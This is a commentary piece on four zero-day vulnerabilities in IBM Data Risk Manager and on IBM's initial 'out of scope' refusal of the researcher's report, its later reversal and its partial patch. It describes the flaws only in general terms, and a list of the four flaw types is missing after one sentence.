Four zero-day vulnerabilities were discovered in IBM’s Data Risk Manager (IDRM). While the zero-day vulnerabilities are concerning, more so is IBM’s response when addressed. The company simply stated, “It’s out of scope” – meaning it had no intention to rectify or address the issue.
Research Director Pedro Ribeiro at Agile Information Security published his findings on GitHub after IBM initially decided to refuse to accept his report. The bugs directly affect IBM’s vulnerability management platform in four major ways that allow for:
These vulnerabilities in the IDRM are especially troubling because of the access that IDRM has on the entire network. IDRM contains credentials to access other tools and even specific vulnerabilities that the enterprise is facing. By exploiting one of these four vulnerabilities, a hacker can open the door of an enterprise, making it especially susceptible to future attacks. These exploits can create a domino effect within the security network of the company, collapsing the entire system by chaining the vulnerabilities together to achieve full remote access as root. So why, if these vulnerabilities are so serious, did IBM refuse to patch them?
Ribeiro disclosed the four vulnerabilities to IBM as part of the organization’s bug disclosure program. In response to his advisory, IBM gave Ribeiro the following response:
“We have assessed this report and closed as being out of scope for our vulnerability disclosure program since this product is only for “enhanced” support paid for by our customers. This is outlined in our policy https://hackerone.com/ibm. To be eligible to participate in this program, you must not be under contract to perform security testing for IBM Corporation, or an IBM subsidiary, or IBM client within 6 months prior to submitting a report.”
Oddly, IBM initially refused a detailed report from a reputable research facility on vulnerabilities. IBM's initial response is also puzzling, as it asks more questions than it answers, and does not address any of Ribeiro’s findings. Because of IBM’s lack of interest in moving forward, Ribeiro was forced to publish his findings on GitHub to make the vulnerabilities known to the public. The response by IBM is bewildering. Why would one of the largest computer hardware companies in the world not only refuse to act but also knowingly place its customers at risk of exposure?
Initially, IBM only admitted to several flaws within the IDRM and denied any major vulnerabilities. Since then, IBM has reneged its position, acknowledging that three of the vulnerabilities exist. In a follow-up email to ZDNet, IBM responded, calling the incident, “a process error that resulted in an improper response to the researcher who reported this situation to IBM.” IBM has also stated that it will release a patch addressing the vulnerabilities, mitigation tips, and a security advisory as follow-up to the event. Regardless of IBM’s revised response, it still begs the question, why did IBM not agree with Ribeiro’s assessment and move to fix it right away? Only after Ribeiro published his findings on GitHub did IBM move to do anything.
While the circumstances seem unusual, IBM is now taking steps to address the problem. However, Ribeiro’s report should have been taken seriously from the beginning, not casually dismissed. Zero-day vulnerabilities of this scale that allow for a complete remote takeover of a network are an extreme security risk to any enterprise. More troubling is that these vulnerabilities originate from IBM, who not only should know to act as soon as possible in these situations but also should do so with its customers’ safety in mind. IBM currently has a single patch that addresses the arbitrary file download and command injection vulnerabilities. Anyone using IBM’s IDRM should seek immediate remediation efforts to partition sections of their network and remain hypervigilant for anything suspicious until IBM’s full patch to address all additional vulnerabilities goes live.